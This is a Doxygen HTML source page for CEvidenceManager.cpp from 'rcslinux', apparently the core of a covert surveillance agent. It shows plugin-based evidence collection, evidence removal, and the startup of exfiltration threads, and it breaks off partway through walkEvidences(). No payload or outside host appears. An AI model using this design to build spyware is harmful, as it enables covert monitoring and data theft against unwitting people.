<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: core/CEvidenceManager.cpp Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_4270bfced15e0e73154b13468c7c9ad9.html">core</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle">
<div class="title">CEvidenceManager.cpp</div>  </div>
</div><!--header-->
<div class="contents">
<a href="CEvidenceManager_8cpp.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="comment">// Created by jrf/ht on 17/02/19.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160; </div>
<div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="bdutils_8h.html">bdutils.h</a>&gt;</span></div>
<div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CEvidenceManager_8h.html">CEvidenceManager.h</a>&quot;</span></div>
<div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CPluginManager_8h.html">CPluginManager.h</a>&quot;</span></div>
<div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CAppContext_8h.html">CAppContext.h</a>&quot;</span></div>
<div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CCommandManager_8h.html">CCommandManager.h</a>&quot;</span></div>
<div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="preprocessor">#include &quot;../libs/bdutils/CMemory.h&quot;</span></div>
<div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CAgentMsgUtils_8h.html">CAgentMsgUtils.h</a>&quot;</span></div>
<div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160;<span class="preprocessor">#include &lt;errno.h&gt;</span></div>
<div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160; </div>
<div class="line"><a name="l00014"></a><span class="lineno">   14</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentCorePrivate.html">AgentCorePrivate</a>;</div>
<div class="line"><a name="l00015"></a><span class="lineno">   15</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentCore.html">AgentCore</a>;</div>
<div class="line"><a name="l00016"></a><span class="lineno">   16</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceBdUtils.html">BdUtils</a>;</div>
<div class="line"><a name="l00017"></a><span class="lineno">   17</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPlugin.html">AgentPlugin</a>;</div>
<div class="line"><a name="l00018"></a><span class="lineno">   18</span>&#160; </div>
<div class="line"><a name="l00019"></a><span class="lineno">   19</span>&#160;<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html">CEvidenceManager</a>* <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#ad5d4212e121a23e86a97db352ceaf5cb">CEvidenceManager::_instance</a> = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00020"></a><span class="lineno">   20</span>&#160; </div>
<div class="line"><a name="l00021"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a33ab6af0d3b7b5f96874a95c048178a6">   21</a></span>&#160;<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a33ab6af0d3b7b5f96874a95c048178a6">CEvidenceManager::CEvidenceManager</a>() {</div>
<div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;    _exThreads = std::map&lt;uint32_t, BdUtils::CThread*&gt;();</div>
<div class="line"><a name="l00023"></a><span class="lineno">   23</span>&#160;}</div>
<div class="line"><a name="l00024"></a><span class="lineno">   24</span>&#160; </div>
<div class="line"><a name="l00025"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#ae73bd7cd3668f2a439031e46eb583f7e">   25</a></span>&#160;<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#ae73bd7cd3668f2a439031e46eb583f7e">CEvidenceManager::~CEvidenceManager</a>() {</div>
<div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160;    <span class="comment">// waits for exfiltration threads termination, if any</span></div>
<div class="line"><a name="l00027"></a><span class="lineno">   27</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;waiting for exfiltration threads to terminate&quot;</span>);</div>
<div class="line"><a name="l00028"></a><span class="lineno">   28</span>&#160;    <span class="keywordflow">while</span> (!_exThreads.empty()) {</div>
<div class="line"><a name="l00029"></a><span class="lineno">   29</span>&#160;        CThread::sleep(1000);</div>
<div class="line"><a name="l00030"></a><span class="lineno">   30</span>&#160;    }</div>
<div class="line"><a name="l00031"></a><span class="lineno">   31</span>&#160; </div>
<div class="line"><a name="l00032"></a><span class="lineno">   32</span>&#160;    <span class="comment">// delete the recurrent exfiltrator thread, waiting for termination)</span></div>
<div class="line"><a name="l00033"></a><span class="lineno">   33</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;waiting for recurrent exfiltration thread to terminate&quot;</span>);</div>
<div class="line"><a name="l00034"></a><span class="lineno">   34</span>&#160;    <span class="keyword">delete</span> _tRecurrent;</div>
<div class="line"><a name="l00035"></a><span class="lineno">   35</span>&#160; </div>
<div class="line"><a name="l00036"></a><span class="lineno">   36</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;evidence manager terminating!&quot;</span>);</div>
<div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;}</div>
<div class="line"><a name="l00038"></a><span class="lineno">   38</span>&#160; </div>
<div class="line"><a name="l00044"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#add0abd478aab282ec0856391bd430f90">   44</a></span>&#160;<a class="code" href="classAgentPlugin_1_1IPlugin.html">AgentPlugin::IPlugin</a>* <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#add0abd478aab282ec0856391bd430f90">CEvidenceManager::getModEvidence</a>() {</div>
<div class="line"><a name="l00045"></a><span class="lineno">   45</span>&#160;    std::vector&lt;IPlugin*&gt; v = <a class="code" href="classAgentCorePrivate_1_1CPluginManager.html#a4f345322bbf09583ec9e1c354b716767">CPluginManager::instance</a>()-&gt;<a class="code" href="classAgentCorePrivate_1_1CPluginManager.html#aaef4e424861e3b4aeac70502c35be1e4">findLoadedPluginsByType</a>(<a class="code" href="group__PLUGINS__INTERNAL.html#ga98814f0ed6e9b415084070f7640af5a2">PLUGIN_TYPE_EVIDENCE</a>);</div>
<div class="line"><a name="l00046"></a><span class="lineno">   46</span>&#160;    <span class="keywordflow">if</span> (v.empty()) {</div>
<div class="line"><a name="l00047"></a><span class="lineno">   47</span>&#160;        <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;no evidence plugin found, cannot generate evidence&quot;</span>);</div>
<div class="line"><a name="l00048"></a><span class="lineno">   48</span>&#160;        <span class="keywordflow">return</span> <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00049"></a><span class="lineno">   49</span>&#160;    }</div>
<div class="line"><a name="l00050"></a><span class="lineno">   50</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a>* p = v.front();</div>
<div class="line"><a name="l00051"></a><span class="lineno">   51</span>&#160;    <span class="keywordflow">return</span> p;</div>
<div class="line"><a name="l00052"></a><span class="lineno">   52</span>&#160;}</div>
<div class="line"><a name="l00053"></a><span class="lineno">   53</span>&#160; </div>
<div class="line"><a name="l00059"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#aa5443d7b718bdb99b6e4cb4103efbec0">   59</a></span>&#160;std::vector&lt;AgentPlugin::IPlugin*&gt; <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#aa5443d7b718bdb99b6e4cb4103efbec0">CEvidenceManager::getExfiltrators</a>(){</div>
<div class="line"><a name="l00060"></a><span class="lineno">   60</span>&#160;    std::vector&lt;IPlugin*&gt; v = <a class="code" href="classAgentCorePrivate_1_1CPluginManager.html#a4f345322bbf09583ec9e1c354b716767">CPluginManager::instance</a>()-&gt;<a class="code" href="classAgentCorePrivate_1_1CPluginManager.html#aaef4e424861e3b4aeac70502c35be1e4">findLoadedPluginsByType</a>(<a class="code" href="group__PLUGINS__INTERNAL.html#ga69cec44b1cd1764894339faa86ebcf0f">PLUGIN_TYPE_EXFILTRATOR</a>);</div>
<div class="line"><a name="l00061"></a><span class="lineno">   61</span>&#160;    <span class="keywordflow">if</span> (v.empty()) {</div>
<div class="line"><a name="l00062"></a><span class="lineno">   62</span>&#160;        <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;no exfiltator plugin found, cannot exfiltrate&quot;</span>);</div>
<div class="line"><a name="l00063"></a><span class="lineno">   63</span>&#160;    }</div>
<div class="line"><a name="l00064"></a><span class="lineno">   64</span>&#160;    <span class="keywordflow">return</span> v;</div>
<div class="line"><a name="l00065"></a><span class="lineno">   65</span>&#160;}</div>
<div class="line"><a name="l00066"></a><span class="lineno">   66</span>&#160; </div>
<div class="line"><a name="l00067"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#adb43dab1fa8ee25a11a91b9f2ae8c9fc">   67</a></span>&#160;<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html">CEvidenceManager</a> *<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#adb43dab1fa8ee25a11a91b9f2ae8c9fc">CEvidenceManager::instance</a>() {</div>
<div class="line"><a name="l00068"></a><span class="lineno">   68</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> == <span class="keyword">nullptr</span> ) {</div>
<div class="line"><a name="l00069"></a><span class="lineno">   69</span>&#160;        <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> = <span class="keyword">new</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html">CEvidenceManager</a>();</div>
<div class="line"><a name="l00070"></a><span class="lineno">   70</span>&#160;    }</div>
<div class="line"><a name="l00071"></a><span class="lineno">   71</span>&#160;    <span class="keywordflow">return</span> <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a>;</div>
<div class="line"><a name="l00072"></a><span class="lineno">   72</span>&#160;}</div>
<div class="line"><a name="l00073"></a><span class="lineno">   73</span>&#160; </div>
<div class="line"><a name="l00074"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a1ef3f3b695d93f3bbb693f3c8197cf79">   74</a></span>&#160;<span class="keywordtype">void</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a1ef3f3b695d93f3bbb693f3c8197cf79">CEvidenceManager::enable</a>(<span class="keywordtype">bool</span> capture) {</div>
<div class="line"><a name="l00075"></a><span class="lineno">   75</span>&#160;    _capture = capture;</div>
<div class="line"><a name="l00076"></a><span class="lineno">   76</span>&#160;    <span class="keywordflow">if</span> (_capture) {</div>
<div class="line"><a name="l00077"></a><span class="lineno">   77</span>&#160;        <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;eviden collection enabled!&quot;</span>);</div>
<div class="line"><a name="l00078"></a><span class="lineno">   78</span>&#160;    }</div>
<div class="line"><a name="l00079"></a><span class="lineno">   79</span>&#160;    <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00080"></a><span class="lineno">   80</span>&#160;        <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;evidence collection disabled (run out of cache space&quot;</span>);</div>
<div class="line"><a name="l00081"></a><span class="lineno">   81</span>&#160;    }</div>
<div class="line"><a name="l00082"></a><span class="lineno">   82</span>&#160;}</div>
<div class="line"><a name="l00083"></a><span class="lineno">   83</span>&#160; </div>
<div class="line"><a name="l00084"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a103a4399425e542fa3aacadea334b256">   84</a></span>&#160;<span class="keywordtype">bool</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a103a4399425e542fa3aacadea334b256">CEvidenceManager::isEnabled</a>() {</div>
<div class="line"><a name="l00085"></a><span class="lineno">   85</span>&#160;    <span class="keywordflow">return</span> _capture;</div>
<div class="line"><a name="l00086"></a><span class="lineno">   86</span>&#160;}</div>
<div class="line"><a name="l00087"></a><span class="lineno">   87</span>&#160; </div>
<div class="line"><a name="l00088"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a60d91f6312a54e46a1c083d9efef8dae">   88</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a60d91f6312a54e46a1c083d9efef8dae">CEvidenceManager::init</a>() {</div>
<div class="line"><a name="l00089"></a><span class="lineno">   89</span>&#160;    <span class="comment">// check if the evidence plugin initialized correctly, if present</span></div>
<div class="line"><a name="l00090"></a><span class="lineno">   90</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a>* p = getModEvidence();</div>
<div class="line"><a name="l00091"></a><span class="lineno">   91</span>&#160;    <span class="keywordflow">if</span> (p &amp;&amp; !p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#aab688fb06a6019325e46a27ea8e1189e">isInitialized</a>()) {</div>
<div class="line"><a name="l00092"></a><span class="lineno">   92</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;evidence plugin present but failed initialization, can&#39;t start!&quot;</span>);</div>
<div class="line"><a name="l00093"></a><span class="lineno">   93</span>&#160;        <span class="keywordflow">return</span> ECANCELED;</div>
<div class="line"><a name="l00094"></a><span class="lineno">   94</span>&#160;    }</div>
<div class="line"><a name="l00095"></a><span class="lineno">   95</span>&#160; </div>
<div class="line"><a name="l00096"></a><span class="lineno">   96</span>&#160;    <span class="comment">// starts the recurrent exfiltrator thread</span></div>
<div class="line"><a name="l00097"></a><span class="lineno">   97</span>&#160;    _tRecurrent = <span class="keyword">new</span> <a class="code" href="classBdUtils_1_1CThread.html">CThread</a>(<span class="keyword">false</span>, &amp;<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#ad93abbe81d3b0740554dae7b85c6a617">CEvidenceManager::recurrentExfiltratorThread</a>, <span class="keyword">this</span>);</div>
<div class="line"><a name="l00098"></a><span class="lineno">   98</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00099"></a><span class="lineno">   99</span>&#160;}</div>
<div class="line"><a name="l00100"></a><span class="lineno">  100</span>&#160; </div>
<div class="line"><a name="l00101"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a949a8c4be3a4866783eb139f12fff2e7">  101</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a949a8c4be3a4866783eb139f12fff2e7">CEvidenceManager::removeEvidence</a>(<span class="keyword">const</span> <span class="keywordtype">char</span> *path) {</div>
<div class="line"><a name="l00102"></a><span class="lineno">  102</span>&#160;    <span class="keywordflow">if</span> (!path) {</div>
<div class="line"><a name="l00103"></a><span class="lineno">  103</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00104"></a><span class="lineno">  104</span>&#160;    }</div>
<div class="line"><a name="l00105"></a><span class="lineno">  105</span>&#160; </div>
<div class="line"><a name="l00106"></a><span class="lineno">  106</span>&#160;    <span class="comment">// calls into modevidence plugin</span></div>
<div class="line"><a name="l00107"></a><span class="lineno">  107</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *p = getModEvidence();</div>
<div class="line"><a name="l00108"></a><span class="lineno">  108</span>&#160;    <span class="keywordflow">if</span> (!p) {</div>
<div class="line"><a name="l00109"></a><span class="lineno">  109</span>&#160;        <span class="keywordflow">return</span> ECANCELED;</div>
<div class="line"><a name="l00110"></a><span class="lineno">  110</span>&#160;    }</div>
<div class="line"><a name="l00111"></a><span class="lineno">  111</span>&#160; </div>
<div class="line"><a name="l00112"></a><span class="lineno">  112</span>&#160;    <span class="comment">// build start parameters and call plugin&#39;s start routine</span></div>
<div class="line"><a name="l00113"></a><span class="lineno">  113</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a> pars={0};</div>
<div class="line"><a name="l00114"></a><span class="lineno">  114</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a> = (<span class="keywordtype">void</span>*)path;</div>
<div class="line"><a name="l00115"></a><span class="lineno">  115</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> = <a class="code" href="group__EVIDENCE__INTERNAL.html#gabd852dd6e48372d695a19e827694ae1b">EVIDENCE_REMOVE</a>;</div>
<div class="line"><a name="l00116"></a><span class="lineno">  116</span>&#160;    <span class="keywordtype">int</span> res = p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#acc8da2fca63545b8e6e2bb841b6981cb">start</a>(&amp;pars);</div>
<div class="line"><a name="l00117"></a><span class="lineno">  117</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00118"></a><span class="lineno">  118</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;error removing evidence, res=%d&quot;</span>, res);</div>
<div class="line"><a name="l00119"></a><span class="lineno">  119</span>&#160;        <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00120"></a><span class="lineno">  120</span>&#160;    }</div>
<div class="line"><a name="l00121"></a><span class="lineno">  121</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;removed evidence, path=%s&quot;</span>, path);</div>
<div class="line"><a name="l00122"></a><span class="lineno">  122</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00123"></a><span class="lineno">  123</span>&#160;}</div>
<div class="line"><a name="l00124"></a><span class="lineno">  124</span>&#160; </div>
<div class="line"><a name="l00125"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a509aeea251df54360894930a94795d11">  125</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a509aeea251df54360894930a94795d11">CEvidenceManager::currentStorageSize</a>(uint64_t *size) {</div>
<div class="line"><a name="l00126"></a><span class="lineno">  126</span>&#160;    <span class="keywordflow">if</span> (!size) {</div>
<div class="line"><a name="l00127"></a><span class="lineno">  127</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00128"></a><span class="lineno">  128</span>&#160;    }</div>
<div class="line"><a name="l00129"></a><span class="lineno">  129</span>&#160;    <span class="comment">// calls into modevidence plugin</span></div>
<div class="line"><a name="l00130"></a><span class="lineno">  130</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *p = getModEvidence();</div>
<div class="line"><a name="l00131"></a><span class="lineno">  131</span>&#160;    <span class="keywordflow">if</span> (!p) {</div>
<div class="line"><a name="l00132"></a><span class="lineno">  132</span>&#160;        <span class="keywordflow">return</span> ECANCELED;</div>
<div class="line"><a name="l00133"></a><span class="lineno">  133</span>&#160;    }</div>
<div class="line"><a name="l00134"></a><span class="lineno">  134</span>&#160; </div>
<div class="line"><a name="l00135"></a><span class="lineno">  135</span>&#160;    <span class="comment">// build start parameters and call plugin&#39;s start routine</span></div>
<div class="line"><a name="l00136"></a><span class="lineno">  136</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a> pars={0};</div>
<div class="line"><a name="l00137"></a><span class="lineno">  137</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> = <a class="code" href="group__EVIDENCE__INTERNAL.html#ga9eb6e189e7295dc2ba2af6bda819f6dc">EVIDENCE_STORAGE_SIZE</a>;</div>
<div class="line"><a name="l00138"></a><span class="lineno">  138</span>&#160;    <span class="keywordtype">int</span> res = p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#acc8da2fca63545b8e6e2bb841b6981cb">start</a>(&amp;pars);</div>
<div class="line"><a name="l00139"></a><span class="lineno">  139</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00140"></a><span class="lineno">  140</span>&#160;        <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00141"></a><span class="lineno">  141</span>&#160;    }</div>
<div class="line"><a name="l00142"></a><span class="lineno">  142</span>&#160;    *size = pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">storageSize</a>;</div>
<div class="line"><a name="l00143"></a><span class="lineno">  143</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00144"></a><span class="lineno">  144</span>&#160;}</div>
<div class="line"><a name="l00145"></a><span class="lineno">  145</span>&#160; </div>
<div class="line"><a name="l00146"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a0ece8b1f145cbe0c102e32516f883210">  146</a></span>&#160;<span class="keyword">const</span> <span class="keywordtype">char</span> *<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a0ece8b1f145cbe0c102e32516f883210">CEvidenceManager::storagePath</a>() {</div>
<div class="line"><a name="l00147"></a><span class="lineno">  147</span>&#160;    <span class="comment">// calls into modevidence plugin</span></div>
<div class="line"><a name="l00148"></a><span class="lineno">  148</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *p = getModEvidence();</div>
<div class="line"><a name="l00149"></a><span class="lineno">  149</span>&#160;    <span class="keywordflow">if</span> (!p) {</div>
<div class="line"><a name="l00150"></a><span class="lineno">  150</span>&#160;        <span class="keywordflow">return</span> <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00151"></a><span class="lineno">  151</span>&#160;    }</div>
<div class="line"><a name="l00152"></a><span class="lineno">  152</span>&#160; </div>
<div class="line"><a name="l00153"></a><span class="lineno">  153</span>&#160;    <span class="comment">// build start parameters and call plugin&#39;s start routine</span></div>
<div class="line"><a name="l00154"></a><span class="lineno">  154</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a> pars={0};</div>
<div class="line"><a name="l00155"></a><span class="lineno">  155</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> = <a class="code" href="group__EVIDENCE__INTERNAL.html#ga9fd73bd75e66453d42897b6efacbb319">EVIDENCE_STORAGE_PATH</a>;</div>
<div class="line"><a name="l00156"></a><span class="lineno">  156</span>&#160;    <span class="keywordtype">int</span> res = p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#acc8da2fca63545b8e6e2bb841b6981cb">start</a>(&amp;pars);</div>
<div class="line"><a name="l00157"></a><span class="lineno">  157</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00158"></a><span class="lineno">  158</span>&#160;        <span class="keywordflow">return</span> <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00159"></a><span class="lineno">  159</span>&#160;    }</div>
<div class="line"><a name="l00160"></a><span class="lineno">  160</span>&#160; </div>
<div class="line"><a name="l00161"></a><span class="lineno">  161</span>&#160;    <span class="comment">// returns a duplicate to be freed</span></div>
<div class="line"><a name="l00162"></a><span class="lineno">  162</span>&#160;    <span class="keywordtype">char</span>* s = CString::dup(pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">storagePath</a>);</div>
<div class="line"><a name="l00163"></a><span class="lineno">  163</span>&#160;    <span class="keywordflow">return</span> s;</div>
<div class="line"><a name="l00164"></a><span class="lineno">  164</span>&#160;}</div>
<div class="line"><a name="l00165"></a><span class="lineno">  165</span>&#160; </div>
<div class="line"><a name="l00166"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a36949042a633149027199ae3e41c3e31">  166</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a36949042a633149027199ae3e41c3e31">CEvidenceManager::walkEvidences</a>() {</div>
<div class="line"><a name="l00167"></a><span class="lineno">  167</span>&#160;    <span class="keywordflow">if</span> (_walkRunning) {</div>
<div class="line"><a name="l00168"></a><span class="lineno">  168</span>&#160;        <span class="comment">// walk evidences can run on a single thread only</span></div>
<div class="line"><a name="l00169"></a><span class="lineno">  169</span>&#160;        <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;walkEvidences() already running, skipping!&quot;</span>);</div>
<div class="line"><a name="l00170"></a><span class="lineno">  170</span>&#160;        <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00171"></a><span class="lineno">  171</span>&#160;    }</div>
<div class="line"><a name="l00172"></a><span class="lineno">  172</span>&#160; </div>
<div class="line"><a name="l00173"></a><span class="lineno">  173</span>&#160;    <span class="comment">// get modevidence</span></div>
<div class="line"><a name="l00174"></a><span class="lineno">  174</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *p = getModEvidence();</div>
<div class="line"><a name="l00175"></a><span class="lineno">  175</span>&#160;    <span class="keywordflow">if</span> (!p) {</div>
<div class="line"><a name="l00176"></a><span class="lineno">  176</span>&#160;        <span class="keywordflow">return</span> ECANCELED;</div>
<div class="line"><a name="l00177"></a><span class="lineno">  177</span>&#160;    }</div>
<div class="line"><a name="l00178"></a><span class="lineno">  178</span>&#160; </div>
<div class="line"><a name="l00179"></a><span class="lineno">  179</span>&#160;    <span class="comment">// build start parameters and call modevidence plugin&#39;s start routine</span></div>
<div class="line"><a name="l00180"></a><span class="lineno">  180</span>&#160;    _walkRunning = <span class="keyword">true</span>;</div>
<div class="line"><a name="l00181"></a><span class="lineno">  181</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a> pars={0};</div>
<div class="line"><a name="l00182"></a><span class="lineno">  182</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> = <a class="code" href="group__EVIDENCE__INTERNAL.html#gabf196e25206d836cd8e6cf3e8664ba94">EVIDENCE_WALK</a>;</div>
